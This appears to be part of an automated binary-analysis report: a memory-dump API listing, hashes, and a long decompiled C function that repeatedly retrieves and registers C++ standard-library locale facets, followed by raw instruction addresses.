                                                                                                0x00f914fe
                                                                                                0x00000000
                                                                                                0x00f914fe
                                                                                                0x00f914c5
                                                                                                0x00f914c5
                                                                                                0x00000000
                                                                                                0x00f914c5
                                                                                                0x00f914c3
                                                                                                0x00f91447
                                                                                                0x00f91447
                                                                                                0x00f9144a
                                                                                                0x00f9144e
                                                                                                0x00f91452
                                                                                                0x00f9145f
                                                                                                0x00f91467
                                                                                                0x00f91469
                                                                                                0x00000000
                                                                                                0x00f91469
                                                                                                0x00f91430
                                                                                                0x00f91430
                                                                                                0x00000000
                                                                                                0x00f91430
                                                                                                0x00f9142e

                                                                                                APIs
                                                                                                • __EH_prolog3.LIBCMT ref: 00F913F7
                                                                                                • std::_Lockit::_Lockit.LIBCPMT ref: 00F91401
                                                                                                  • Part of subcall function 00F789D0: std::_Lockit::_Lockit.LIBCPMT ref: 00F78A00
                                                                                                  • Part of subcall function 00F789D0: std::_Lockit::~_Lockit.LIBCPMT ref: 00F78A28
                                                                                                • std::_Facet_Register.LIBCPMT ref: 00F91452
                                                                                                • std::_Lockit::~_Lockit.LIBCPMT ref: 00F91472
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000E.00000002.327941628.0000000000F71000.00000020.00020000.sdmp, Offset: 00F70000, based on PE: true
                                                                                                • Associated: 0000000E.00000002.327936467.0000000000F70000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 0000000E.00000002.327980112.0000000000FB8000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 0000000E.00000002.328006358.0000000000FCF000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 0000000E.00000002.328015005.0000000000FD3000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                                                • String ID:
                                                                                                • API String ID: 2854358121-0
                                                                                                • Opcode ID: 8ed16f7a89ba85d0baffc007eefb34041229a5df7fbb8cd117f0fa5bb4556443
                                                                                                • Instruction ID: 70c2f4897b707665a770540a38662ca67b690601939f7737d091949ad7607058
                                                                                                • Opcode Fuzzy Hash: 8ed16f7a89ba85d0baffc007eefb34041229a5df7fbb8cd117f0fa5bb4556443
                                                                                                • Instruction Fuzzy Hash: B001C43590012A9BDF05EB64CC156FEB772BF84764F54401AE815A7291DF389E06BB82
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 71%
                                                                                                			E00F87383(void* __edi, void* __esi, void* __eflags, intOrPtr _a8) {
                                                                                                				signed int _v4;
                                                                                                				signed int _v16;
                                                                                                				char _v20;
                                                                                                				intOrPtr _v44;
                                                                                                				signed int _t153;
                                                                                                				void* _t279;
                                                                                                				short* _t403;
                                                                                                				void* _t440;
                                                                                                				signed int _t443;
                                                                                                				signed int _t444;
                                                                                                				signed int _t445;
                                                                                                				signed int _t446;
                                                                                                				signed int _t447;
                                                                                                				signed int _t448;
                                                                                                				signed int _t449;
                                                                                                				signed int _t450;
                                                                                                				signed int _t451;
                                                                                                				signed int _t452;
                                                                                                				signed int _t453;
                                                                                                				signed int _t455;
                                                                                                				signed int _t456;
                                                                                                				signed int _t457;
                                                                                                				signed int _t458;
                                                                                                				signed int _t459;
                                                                                                				signed int _t460;
                                                                                                				signed int _t461;
                                                                                                				signed int _t462;
                                                                                                				signed int _t463;
                                                                                                				signed int _t464;
                                                                                                				signed int _t465;
                                                                                                				signed int _t466;
                                                                                                				short* _t467;
                                                                                                
                                                                                                				_push(8);
                                                                                                				E00FB38B2(0xfb6ebe, __edi, __esi);
                                                                                                				E00F856E6( &_v20, 0);
                                                                                                				_t455 =  *0xfd0b0c; // 0x0
                                                                                                				_v4 = _v4 & 0x00000000;
                                                                                                				_v16 = _t455;
                                                                                                				_t153 = E00F78A40(_a8, E00F789D0());
                                                                                                				_t442 = _t153;
                                                                                                				if(_t153 != 0) {
                                                                                                					L5:
                                                                                                					E00F8573E( &_v20);
                                                                                                					return E00FB388C(_t442);
                                                                                                				} else {
                                                                                                					if(_t455 == 0) {
                                                                                                						_push(_a8);
                                                                                                						_push( &_v16);
                                                                                                						__eflags = E00F8878C(_t442, _t455, __eflags) - 0xffffffff;
                                                                                                						if(__eflags == 0) {
                                                                                                							E00F78FE0(__eflags);
                                                                                                							asm("int3");
                                                                                                							_push(8);
                                                                                                							E00FB38B2(0xfb6ebe, _t442, _t455);
                                                                                                							E00F856E6( &_v20, 0);
                                                                                                							_t456 =  *0xfd0adc; // 0x0
                                                                                                							_v4 = _v4 & 0x00000000;
                                                                                                							_v16 = _t456;
                                                                                                							_t443 = E00F78A40(_a8, E00F789D0());
                                                                                                							__eflags = _t443;
                                                                                                							if(_t443 != 0) {
                                                                                                								L12:
                                                                                                								E00F8573E( &_v20);
                                                                                                								return E00FB388C(_t443);
                                                                                                							} else {
                                                                                                								__eflags = _t456;
                                                                                                								if(__eflags == 0) {
                                                                                                									_push(_a8);
                                                                                                									_push( &_v16);
                                                                                                									__eflags = E00F887F4(_t443, _t456, __eflags) - 0xffffffff;
                                                                                                									if(__eflags == 0) {
                                                                                                										E00F78FE0(__eflags);
                                                                                                										asm("int3");
                                                                                                										_push(8);
                                                                                                										E00FB38B2(0xfb6ebe, _t443, _t456);
                                                                                                										E00F856E6( &_v20, 0);
                                                                                                										_t457 =  *0xfd0b14; // 0x0
                                                                                                										_v4 = _v4 & 0x00000000;
                                                                                                										_v16 = _t457;
                                                                                                										_t444 = E00F78A40(_a8, E00F789D0());
                                                                                                										__eflags = _t444;
                                                                                                										if(_t444 != 0) {
                                                                                                											L19:
                                                                                                											E00F8573E( &_v20);
                                                                                                											return E00FB388C(_t444);
                                                                                                										} else {
                                                                                                											__eflags = _t457;
                                                                                                											if(__eflags == 0) {
                                                                                                												_push(_a8);
                                                                                                												_push( &_v16);
                                                                                                												__eflags = E00F8885C(_t444, _t457, __eflags) - 0xffffffff;
                                                                                                												if(__eflags == 0) {
                                                                                                													E00F78FE0(__eflags);
                                                                                                													asm("int3");
                                                                                                													_push(8);
                                                                                                													E00FB38B2(0xfb6ebe, _t444, _t457);
                                                                                                													E00F856E6( &_v20, 0);
                                                                                                													_t458 =  *0xfd0b10; // 0x0
                                                                                                													_v4 = _v4 & 0x00000000;
                                                                                                													_v16 = _t458;
                                                                                                													_t445 = E00F78A40(_a8, E00F789D0());
                                                                                                													__eflags = _t445;
                                                                                                													if(_t445 != 0) {
                                                                                                														L26:
                                                                                                														E00F8573E( &_v20);
                                                                                                														return E00FB388C(_t445);
                                                                                                													} else {
                                                                                                														__eflags = _t458;
                                                                                                														if(__eflags == 0) {
                                                                                                															_push(_a8);
                                                                                                															_push( &_v16);
                                                                                                															__eflags = E00F888E0(_t445, _t458, __eflags) - 0xffffffff;
                                                                                                															if(__eflags == 0) {
                                                                                                																E00F78FE0(__eflags);
                                                                                                																asm("int3");
                                                                                                																_push(8);
                                                                                                																E00FB38B2(0xfb6ebe, _t445, _t458);
                                                                                                																E00F856E6( &_v20, 0);
                                                                                                																_t459 =  *0xfd0ae4; // 0x0
                                                                                                																_v4 = _v4 & 0x00000000;
                                                                                                																_v16 = _t459;
                                                                                                																_t446 = E00F78A40(_a8, E00F789D0());
                                                                                                																__eflags = _t446;
                                                                                                																if(_t446 != 0) {
                                                                                                																	L33:
                                                                                                																	E00F8573E( &_v20);
                                                                                                																	return E00FB388C(_t446);
                                                                                                																} else {
                                                                                                																	__eflags = _t459;
                                                                                                																	if(__eflags == 0) {
                                                                                                																		_push(_a8);
                                                                                                																		_push( &_v16);
                                                                                                																		__eflags = E00F88965(_t446, _t459, __eflags) - 0xffffffff;
                                                                                                																		if(__eflags == 0) {
                                                                                                																			E00F78FE0(__eflags);
                                                                                                																			asm("int3");
                                                                                                																			_push(8);
                                                                                                																			E00FB38B2(0xfb6ebe, _t446, _t459);
                                                                                                																			E00F856E6( &_v20, 0);
                                                                                                																			_t460 =  *0xfd0ae0; // 0x0
                                                                                                																			_v4 = _v4 & 0x00000000;
                                                                                                																			_v16 = _t460;
                                                                                                																			_t447 = E00F78A40(_a8, E00F789D0());
                                                                                                																			__eflags = _t447;
                                                                                                																			if(_t447 != 0) {
                                                                                                																				L40:
                                                                                                																				E00F8573E( &_v20);
                                                                                                																				return E00FB388C(_t447);
                                                                                                																			} else {
                                                                                                																				__eflags = _t460;
                                                                                                																				if(__eflags == 0) {
                                                                                                																					_push(_a8);
                                                                                                																					_push( &_v16);
                                                                                                																					__eflags = E00F889E9(_t447, _t460, __eflags) - 0xffffffff;
                                                                                                																					if(__eflags == 0) {
                                                                                                																						E00F78FE0(__eflags);
                                                                                                																						asm("int3");
                                                                                                																						_push(8);
                                                                                                																						E00FB38B2(0xfb6ebe, _t447, _t460);
                                                                                                																						E00F856E6( &_v20, 0);
                                                                                                																						_t461 =  *0xfd0af4; // 0x0
                                                                                                																						_v4 = _v4 & 0x00000000;
                                                                                                																						_v16 = _t461;
                                                                                                																						_t448 = E00F78A40(_a8, E00F789D0());
                                                                                                																						__eflags = _t448;
                                                                                                																						if(_t448 != 0) {
                                                                                                																							L47:
                                                                                                																							E00F8573E( &_v20);
                                                                                                																							return E00FB388C(_t448);
                                                                                                																						} else {
                                                                                                																							__eflags = _t461;
                                                                                                																							if(__eflags == 0) {
                                                                                                																								_push(_a8);
                                                                                                																								_push( &_v16);
                                                                                                																								__eflags = E00F88A6E(_t448, _t461, __eflags) - 0xffffffff;
                                                                                                																								if(__eflags == 0) {
                                                                                                																									E00F78FE0(__eflags);
                                                                                                																									asm("int3");
                                                                                                																									_push(8);
                                                                                                																									E00FB38B2(0xfb6ebe, _t448, _t461);
                                                                                                																									E00F856E6( &_v20, 0);
                                                                                                																									_t462 =  *0xfd0af8; // 0x0
                                                                                                																									_v4 = _v4 & 0x00000000;
                                                                                                																									_v16 = _t462;
                                                                                                																									_t449 = E00F78A40(_a8, E00F789D0());
                                                                                                																									__eflags = _t449;
                                                                                                																									if(_t449 != 0) {
                                                                                                																										L54:
                                                                                                																										E00F8573E( &_v20);
                                                                                                																										return E00FB388C(_t449);
                                                                                                																									} else {
                                                                                                																										__eflags = _t462;
                                                                                                																										if(__eflags == 0) {
                                                                                                																											_push(_a8);
                                                                                                																											_push( &_v16);
                                                                                                																											__eflags = E00F88AD6(_t449, _t462, __eflags) - 0xffffffff;
                                                                                                																											if(__eflags == 0) {
                                                                                                																												E00F78FE0(__eflags);
                                                                                                																												asm("int3");
                                                                                                																												_push(8);
                                                                                                																												E00FB38B2(0xfb6ebe, _t449, _t462);
                                                                                                																												E00F856E6( &_v20, 0);
                                                                                                																												_t463 =  *0xfd0afc; // 0x0
                                                                                                																												_v4 = _v4 & 0x00000000;
                                                                                                																												_v16 = _t463;
                                                                                                																												_t450 = E00F78A40(_a8, E00F789D0());
                                                                                                																												__eflags = _t450;
                                                                                                																												if(_t450 != 0) {
                                                                                                																													L61:
                                                                                                																													E00F8573E( &_v20);
                                                                                                																													return E00FB388C(_t450);
                                                                                                																												} else {
                                                                                                																													__eflags = _t463;
                                                                                                																													if(__eflags == 0) {
                                                                                                																														_push(_a8);
                                                                                                																														_push( &_v16);
                                                                                                																														__eflags = E00F88B3E(_t440, _t450, _t463, __eflags) - 0xffffffff;
                                                                                                																														if(__eflags == 0) {
                                                                                                																															E00F78FE0(__eflags);
                                                                                                																															asm("int3");
                                                                                                																															_push(8);
                                                                                                																															E00FB38B2(0xfb6ebe, _t450, _t463);
                                                                                                																															E00F856E6( &_v20, 0);
                                                                                                																															_t464 =  *0xfd0b18; // 0x0
                                                                                                																															_v4 = _v4 & 0x00000000;
                                                                                                																															_v16 = _t464;
                                                                                                																															_t451 = E00F78A40(_a8, E00F789D0());
                                                                                                																															__eflags = _t451;
                                                                                                																															if(_t451 != 0) {
                                                                                                																																L68:
                                                                                                																																E00F8573E( &_v20);
                                                                                                																																return E00FB388C(_t451);
                                                                                                																															} else {
                                                                                                																																__eflags = _t464;
                                                                                                																																if(__eflags == 0) {
                                                                                                																																	_push(_a8);
                                                                                                																																	_push( &_v16);
                                                                                                																																	__eflags = E00F88BB9(_t451, _t464, __eflags) - 0xffffffff;
                                                                                                																																	if(__eflags == 0) {
                                                                                                																																		E00F78FE0(__eflags);
                                                                                                																																		asm("int3");
                                                                                                																																		_push(8);
                                                                                                																																		E00FB38B2(0xfb6ebe, _t451, _t464);
                                                                                                																																		E00F856E6( &_v20, 0);
                                                                                                																																		_t465 =  *0xfd0ae8; // 0x0
                                                                                                																																		_v4 = _v4 & 0x00000000;
                                                                                                																																		_v16 = _t465;
                                                                                                																																		_t452 = E00F78A40(_a8, E00F789D0());
                                                                                                																																		__eflags = _t452;
                                                                                                																																		if(_t452 != 0) {
                                                                                                																																			L75:
                                                                                                																																			E00F8573E( &_v20);
                                                                                                																																			return E00FB388C(_t452);
                                                                                                																																		} else {
                                                                                                																																			__eflags = _t465;
                                                                                                																																			if(__eflags == 0) {
                                                                                                																																				_push(_a8);
                                                                                                																																				_push( &_v16);
                                                                                                																																				__eflags = E00F88C25(_t452, _t465, __eflags) - 0xffffffff;
                                                                                                																																				if(__eflags == 0) {
                                                                                                																																					E00F78FE0(__eflags);
                                                                                                																																					asm("int3");
                                                                                                																																					_push(8);
                                                                                                																																					E00FB38B2(0xfb6ebe, _t452, _t465);
                                                                                                																																					E00F856E6( &_v20, 0);
                                                                                                																																					_t466 =  *0xfd0b1c; // 0x0
                                                                                                																																					_v4 = _v4 & 0x00000000;
                                                                                                																																					_v16 = _t466;
                                                                                                																																					_t453 = E00F78A40(_a8, E00F789D0());
                                                                                                																																					__eflags = _t453;
                                                                                                																																					if(_t453 != 0) {
                                                                                                																																						L82:
                                                                                                																																						E00F8573E( &_v20);
                                                                                                																																						return E00FB388C(_t453);
                                                                                                																																					} else {
                                                                                                																																						__eflags = _t466;
                                                                                                																																						if(__eflags == 0) {
                                                                                                																																							_push(_a8);
                                                                                                																																							_push( &_v16);
                                                                                                																																							_t279 = E00F88C91(_t453, _t466, __eflags);
                                                                                                																																							_pop(_t403);
                                                                                                																																							__eflags = _t279 - 0xffffffff;
                                                                                                																																							if(__eflags == 0) {
                                                                                                																																								E00F78FE0(__eflags);
                                                                                                																																								asm("int3");
                                                                                                																																								_push(_t466);
                                                                                                																																								_t467 = _t403;
                                                                                                																																								_t146 = _t467 + 0x10;
                                                                                                																																								 *_t146 =  *(_t467 + 0x10) & 0x00000000;
                                                                                                																																								__eflags =  *_t146;
                                                                                                																																								 *((intOrPtr*)(_t467 + 0x14)) = 7;
                                                                                                																																								 *_t467 = 0;
                                                                                                																																								E00F8D9F3(_v44);
                                                                                                																																								return _t467;
                                                                                                																																							} else {
                                                                                                																																								_t453 = _v16;
                                                                                                																																								_v16 = _t453;
                                                                                                																																								_v4 = 1;
                                                                                                																																								E00F85472(_t453);
                                                                                                																																								 *0xfb81fc();
                                                                                                																																								 *((intOrPtr*)( *((intOrPtr*)( *_t453 + 4))))();
                                                                                                																																								 *0xfd0b1c = _t453;
                                                                                                																																								goto L82;
                                                                                                																																							}
                                                                                                																																						} else {
                                                                                                																																							_t453 = _t466;
                                                                                                																																							goto L82;
                                                                                                																																						}
                                                                                                																																					}
                                                                                                																																				} else {
                                                                                                																																					_t452 = _v16;
                                                                                                																																					_v16 = _t452;
                                                                                                																																					_v4 = 1;
                                                                                                																																					E00F85472(_t452);
                                                                                                																																					 *0xfb81fc();
                                                                                                																																					 *((intOrPtr*)( *((intOrPtr*)( *_t452 + 4))))();
                                                                                                																																					 *0xfd0ae8 = _t452;
                                                                                                																																					goto L75;
                                                                                                																																				}
                                                                                                																																			} else {
                                                                                                																																				_t452 = _t465;
                                                                                                																																				goto L75;
                                                                                                																																			}
                                                                                                																																		}
                                                                                                																																	} else {
                                                                                                																																		_t451 = _v16;
                                                                                                																																		_v16 = _t451;
                                                                                                																																		_v4 = 1;
                                                                                                																																		E00F85472(_t451);
                                                                                                																																		 *0xfb81fc();
                                                                                                																																		 *((intOrPtr*)( *((intOrPtr*)( *_t451 + 4))))();
                                                                                                																																		 *0xfd0b18 = _t451;
                                                                                                																																		goto L68;
                                                                                                																																	}
                                                                                                																																} else {
                                                                                                																																	_t451 = _t464;
                                                                                                																																	goto L68;
                                                                                                																																}
                                                                                                																															}
                                                                                                																														} else {
                                                                                                																															_t450 = _v16;
                                                                                                																															_v16 = _t450;
                                                                                                																															_v4 = 1;
                                                                                                																															E00F85472(_t450);
                                                                                                																															 *0xfb81fc();
                                                                                                																															 *((intOrPtr*)( *((intOrPtr*)( *_t450 + 4))))();
                                                                                                																															 *0xfd0afc = _t450;
                                                                                                																															goto L61;
                                                                                                																														}
                                                                                                																													} else {
                                                                                                																														_t450 = _t463;
                                                                                                																														goto L61;
                                                                                                																													}
                                                                                                																												}
                                                                                                																											} else {
                                                                                                																												_t449 = _v16;
                                                                                                																												_v16 = _t449;
                                                                                                																												_v4 = 1;
                                                                                                																												E00F85472(_t449);
                                                                                                																												 *0xfb81fc();
                                                                                                																												 *((intOrPtr*)( *((intOrPtr*)( *_t449 + 4))))();
                                                                                                																												 *0xfd0af8 = _t449;
                                                                                                																												goto L54;
                                                                                                																											}
                                                                                                																										} else {
                                                                                                																											_t449 = _t462;
                                                                                                																											goto L54;
                                                                                                																										}
                                                                                                																									}
                                                                                                																								} else {
                                                                                                																									_t448 = _v16;
                                                                                                																									_v16 = _t448;
                                                                                                																									_v4 = 1;
                                                                                                																									E00F85472(_t448);
                                                                                                																									 *0xfb81fc();
                                                                                                																									 *((intOrPtr*)( *((intOrPtr*)( *_t448 + 4))))();
                                                                                                																									 *0xfd0af4 = _t448;
                                                                                                																									goto L47;
                                                                                                																								}
                                                                                                																							} else {
                                                                                                																								_t448 = _t461;
                                                                                                																								goto L47;
                                                                                                																							}
                                                                                                																						}
                                                                                                																					} else {
                                                                                                																						_t447 = _v16;
                                                                                                																						_v16 = _t447;
                                                                                                																						_v4 = 1;
                                                                                                																						E00F85472(_t447);
                                                                                                																						 *0xfb81fc();
                                                                                                																						 *((intOrPtr*)( *((intOrPtr*)( *_t447 + 4))))();
                                                                                                																						 *0xfd0ae0 = _t447;
                                                                                                																						goto L40;
                                                                                                																					}
                                                                                                																				} else {
                                                                                                																					_t447 = _t460;
                                                                                                																					goto L40;
                                                                                                																				}
                                                                                                																			}
                                                                                                																		} else {
                                                                                                																			_t446 = _v16;
                                                                                                																			_v16 = _t446;
                                                                                                																			_v4 = 1;
                                                                                                																			E00F85472(_t446);
                                                                                                																			 *0xfb81fc();
                                                                                                																			 *((intOrPtr*)( *((intOrPtr*)( *_t446 + 4))))();
                                                                                                																			 *0xfd0ae4 = _t446;
                                                                                                																			goto L33;
                                                                                                																		}
                                                                                                																	} else {
                                                                                                																		_t446 = _t459;
                                                                                                																		goto L33;
                                                                                                																	}
                                                                                                																}
                                                                                                															} else {
                                                                                                																_t445 = _v16;
                                                                                                																_v16 = _t445;
                                                                                                																_v4 = 1;
                                                                                                																E00F85472(_t445);
                                                                                                																 *0xfb81fc();
                                                                                                																 *((intOrPtr*)( *((intOrPtr*)( *_t445 + 4))))();
                                                                                                																 *0xfd0b10 = _t445;
                                                                                                																goto L26;
                                                                                                															}
                                                                                                														} else {
                                                                                                															_t445 = _t458;
                                                                                                															goto L26;
                                                                                                														}
                                                                                                													}
                                                                                                												} else {
                                                                                                													_t444 = _v16;
                                                                                                													_v16 = _t444;
                                                                                                													_v4 = 1;
                                                                                                													E00F85472(_t444);
                                                                                                													 *0xfb81fc();
                                                                                                													 *((intOrPtr*)( *((intOrPtr*)( *_t444 + 4))))();
                                                                                                													 *0xfd0b14 = _t444;
                                                                                                													goto L19;
                                                                                                												}
                                                                                                											} else {
                                                                                                												_t444 = _t457;
                                                                                                												goto L19;
                                                                                                											}
                                                                                                										}
                                                                                                									} else {
                                                                                                										_t443 = _v16;
                                                                                                										_v16 = _t443;
                                                                                                										_v4 = 1;
                                                                                                										E00F85472(_t443);
                                                                                                										 *0xfb81fc();
                                                                                                										 *((intOrPtr*)( *((intOrPtr*)( *_t443 + 4))))();
                                                                                                										 *0xfd0adc = _t443;
                                                                                                										goto L12;
                                                                                                									}
                                                                                                								} else {
                                                                                                									_t443 = _t456;
                                                                                                									goto L12;
                                                                                                								}
                                                                                                							}
                                                                                                						} else {
                                                                                                							_t442 = _v16;
                                                                                                							_v16 = _t442;
                                                                                                							_v4 = 1;
                                                                                                							E00F85472(_t442);
                                                                                                							 *0xfb81fc();
                                                                                                							 *((intOrPtr*)( *((intOrPtr*)( *_t442 + 4))))();
                                                                                                							 *0xfd0b0c = _t442;
                                                                                                							goto L5;
                                                                                                						}
                                                                                                					} else {
                                                                                                						_t442 = _t455;
                                                                                                						goto L5;
                                                                                                					}
                                                                                                				}
                                                                                                			}



































                                                                                                0x00f87383
                                                                                                0x00f8738a
                                                                                                0x00f87394
                                                                                                0x00f87399
                                                                                                0x00f873a4
                                                                                                0x00f873a8
                                                                                                0x00f873b4
                                                                                                0x00f873b9
                                                                                                0x00f873bd
                                                                                                0x00f87402
                                                                                                0x00f87405
                                                                                                0x00f87411
                                                                                                0x00f873bf
                                                                                                0x00f873c1
                                                                                                0x00f873c7
                                                                                                0x00f873cd
                                                                                                0x00f873d5
                                                                                                0x00f873d8
                                                                                                0x00f87412
                                                                                                0x00f87417
                                                                                                0x00f87418
                                                                                                0x00f8741f
                                                                                                0x00f87429
                                                                                                0x00f8742e
                                                                                                0x00f87439
                                                                                                0x00f8743d
                                                                                                0x00f8744e
                                                                                                0x00f87450
                                                                                                0x00f87452
                                                                                                0x00f87497
                                                                                                0x00f8749a
                                                                                                0x00f874a6
                                                                                                0x00f87454
                                                                                                0x00f87454
                                                                                                0x00f87456
                                                                                                0x00f8745c
                                                                                                0x00f87462
                                                                                                0x00f8746a
                                                                                                0x00f8746d
                                                                                                0x00f874a7
                                                                                                0x00f874ac
                                                                                                0x00f874ad
                                                                                                0x00f874b4
                                                                                                0x00f874be
                                                                                                0x00f874c3
                                                                                                0x00f874ce
                                                                                                0x00f874d2
                                                                                                0x00f874e3
                                                                                                0x00f874e5
                                                                                                0x00f874e7
                                                                                                0x00f8752c
                                                                                                0x00f8752f
                                                                                                0x00f8753b
                                                                                                0x00f874e9
                                                                                                0x00f874e9
                                                                                                0x00f874eb
                                                                                                0x00f874f1
                                                                                                0x00f874f7
                                                                                                0x00f874ff
                                                                                                0x00f87502
                                                                                                0x00f8753c
                                                                                                0x00f87541
                                                                                                0x00f87542
                                                                                                0x00f87549
                                                                                                0x00f87553
                                                                                                0x00f87558
                                                                                                0x00f87563
                                                                                                0x00f87567
                                                                                                0x00f87578
                                                                                                0x00f8757a
                                                                                                0x00f8757c
                                                                                                0x00f875c1
                                                                                                0x00f875c4
                                                                                                0x00f875d0
                                                                                                0x00f8757e
                                                                                                0x00f8757e
                                                                                                0x00f87580
                                                                                                0x00f87586
                                                                                                0x00f8758c
                                                                                                0x00f87594
                                                                                                0x00f87597
                                                                                                0x00f875d1
                                                                                                0x00f875d6
                                                                                                0x00f875d7
                                                                                                0x00f875de
                                                                                                0x00f875e8
                                                                                                0x00f875ed
                                                                                                0x00f875f8
                                                                                                0x00f875fc
                                                                                                0x00f8760d
                                                                                                0x00f8760f
                                                                                                0x00f87611
                                                                                                0x00f87656
                                                                                                0x00f87659
                                                                                                0x00f87665
                                                                                                0x00f87613
                                                                                                0x00f87613
                                                                                                0x00f87615
                                                                                                0x00f8761b
                                                                                                0x00f87621
                                                                                                0x00f87629
                                                                                                0x00f8762c
                                                                                                0x00f87666
                                                                                                0x00f8766b
                                                                                                0x00f8766c
                                                                                                0x00f87673
                                                                                                0x00f8767d
                                                                                                0x00f87682
                                                                                                0x00f8768d
                                                                                                0x00f87691
                                                                                                0x00f876a2
                                                                                                0x00f876a4
                                                                                                0x00f876a6
                                                                                                0x00f876eb
                                                                                                0x00f876ee
                                                                                                0x00f876fa
                                                                                                0x00f876a8
                                                                                                0x00f876a8
                                                                                                0x00f876aa
                                                                                                0x00f876b0
                                                                                                0x00f876b6
                                                                                                0x00f876be
                                                                                                0x00f876c1
                                                                                                0x00f876fb
                                                                                                0x00f87700
                                                                                                0x00f87701
                                                                                                0x00f87708
                                                                                                0x00f87712
                                                                                                0x00f87717
                                                                                                0x00f87722
                                                                                                0x00f87726
                                                                                                0x00f87737
                                                                                                0x00f87739
                                                                                                0x00f8773b
                                                                                                0x00f87780
                                                                                                0x00f87783
                                                                                                0x00f8778f
                                                                                                0x00f8773d
                                                                                                0x00f8773d
                                                                                                0x00f8773f
                                                                                                0x00f87745
                                                                                                0x00f8774b
                                                                                                0x00f87753
                                                                                                0x00f87756
                                                                                                0x00f87790
                                                                                                0x00f87795
                                                                                                0x00f87796
                                                                                                0x00f8779d
                                                                                                0x00f877a7
                                                                                                0x00f877ac
                                                                                                0x00f877b7
                                                                                                0x00f877bb
                                                                                                0x00f877cc
                                                                                                0x00f877ce
                                                                                                0x00f877d0
                                                                                                0x00f87815
                                                                                                0x00f87818
                                                                                                0x00f87824
                                                                                                0x00f877d2
                                                                                                0x00f877d2
                                                                                                0x00f877d4
                                                                                                0x00f877da
                                                                                                0x00f877e0
                                                                                                0x00f877e8
                                                                                                0x00f877eb
                                                                                                0x00f87825
                                                                                                0x00f8782a
                                                                                                0x00f8782b
                                                                                                0x00f87832
                                                                                                0x00f8783c
                                                                                                0x00f87841
                                                                                                0x00f8784c
                                                                                                0x00f87850
                                                                                                0x00f87861
                                                                                                0x00f87863
                                                                                                0x00f87865
                                                                                                0x00f878aa
                                                                                                0x00f878ad
                                                                                                0x00f878b9
                                                                                                0x00f87867
                                                                                                0x00f87867
                                                                                                0x00f87869
                                                                                                0x00f8786f
                                                                                                0x00f87875
                                                                                                0x00f8787d
                                                                                                0x00f87880
                                                                                                0x00f878ba
                                                                                                0x00f878bf
                                                                                                0x00f878c0
                                                                                                0x00f878c7
                                                                                                0x00f878d1
                                                                                                0x00f878d6
                                                                                                0x00f878e1
                                                                                                0x00f878e5
                                                                                                0x00f878f6
                                                                                                0x00f878f8
                                                                                                0x00f878fa
                                                                                                0x00f8793f
                                                                                                0x00f87942
                                                                                                0x00f8794e
                                                                                                0x00f878fc
                                                                                                0x00f878fc
                                                                                                0x00f878fe
                                                                                                0x00f87904
                                                                                                0x00f8790a
                                                                                                0x00f87912
                                                                                                0x00f87915
                                                                                                0x00f8794f
                                                                                                0x00f87954
                                                                                                0x00f87955
                                                                                                0x00f8795c
                                                                                                0x00f87966
                                                                                                0x00f8796b
                                                                                                0x00f87976
                                                                                                0x00f8797a
                                                                                                0x00f8798b
                                                                                                0x00f8798d
                                                                                                0x00f8798f
                                                                                                0x00f879d4
                                                                                                0x00f879d7
                                                                                                0x00f879e3
                                                                                                0x00f87991
                                                                                                0x00f87991
                                                                                                0x00f87993
                                                                                                0x00f87999
                                                                                                0x00f8799f
                                                                                                0x00f879a7
                                                                                                0x00f879aa
                                                                                                0x00f879e4
                                                                                                0x00f879e9
                                                                                                0x00f879ea
                                                                                                0x00f879f1
                                                                                                0x00f879fb
                                                                                                0x00f87a00
                                                                                                0x00f87a0b
                                                                                                0x00f87a0f
                                                                                                0x00f87a20
                                                                                                0x00f87a22
                                                                                                0x00f87a24
                                                                                                0x00f87a69
                                                                                                0x00f87a6c
                                                                                                0x00f87a78
                                                                                                0x00f87a26
                                                                                                0x00f87a26
                                                                                                0x00f87a28
                                                                                                0x00f87a2e
                                                                                                0x00f87a34
                                                                                                0x00f87a35
                                                                                                0x00f87a3b
                                                                                                0x00f87a3c
                                                                                                0x00f87a3f
                                                                                                0x00f87a79
                                                                                                0x00f87a7e
                                                                                                0x00f87a82
                                                                                                0x00f87a86
                                                                                                0x00f87a8a
                                                                                                0x00f87a8a
                                                                                                0x00f87a8a
                                                                                                0x00f87a8e
                                                                                                0x00f87a95
                                                                                                0x00f87a98
                                                                                                0x00f87aa1
                                                                                                0x00f87a41
                                                                                                0x00f87a41
                                                                                                0x00f87a44
                                                                                                0x00f87a48
                                                                                                0x00f87a4c
                                                                                                0x00f87a59
                                                                                                0x00f87a61
                                                                                                0x00f87a63
                                                                                                0x00000000
                                                                                                0x00f87a63
                                                                                                0x00f87a2a
                                                                                                0x00f87a2a
                                                                                                0x00000000
                                                                                                0x00f87a2a
                                                                                                0x00f87a28
                                                                                                0x00f879ac
                                                                                                0x00f879ac
                                                                                                0x00f879af
                                                                                                0x00f879b3
                                                                                                0x00f879b7
                                                                                                0x00f879c4
                                                                                                0x00f879cc
                                                                                                0x00f879ce
                                                                                                0x00000000
                                                                                                0x00f879ce
                                                                                                0x00f87995
                                                                                                0x00f87995
                                                                                                0x00000000
                                                                                                0x00f87995
                                                                                                0x00f87993
                                                                                                0x00f87917
                                                                                                0x00f87917
                                                                                                0x00f8791a
                                                                                                0x00f8791e
                                                                                                0x00f87922
                                                                                                0x00f8792f
                                                                                                0x00f87937
                                                                                                0x00f87939
                                                                                                0x00000000
                                                                                                0x00f87939
                                                                                                0x00f87900
                                                                                                0x00f87900
                                                                                                0x00000000
                                                                                                0x00f87900
                                                                                                0x00f878fe
                                                                                                0x00f87882
                                                                                                0x00f87882
                                                                                                0x00f87885
                                                                                                0x00f87889
                                                                                                0x00f8788d
                                                                                                0x00f8789a
                                                                                                0x00f878a2
                                                                                                0x00f878a4
                                                                                                0x00000000
                                                                                                0x00f878a4
                                                                                                0x00f8786b
                                                                                                0x00f8786b
                                                                                                0x00000000
                                                                                                0x00f8786b
                                                                                                0x00f87869
                                                                                                0x00f877ed
                                                                                                0x00f877ed
                                                                                                0x00f877f0
                                                                                                0x00f877f4
                                                                                                0x00f877f8
                                                                                                0x00f87805
                                                                                                0x00f8780d
                                                                                                0x00f8780f
                                                                                                0x00000000
                                                                                                0x00f8780f
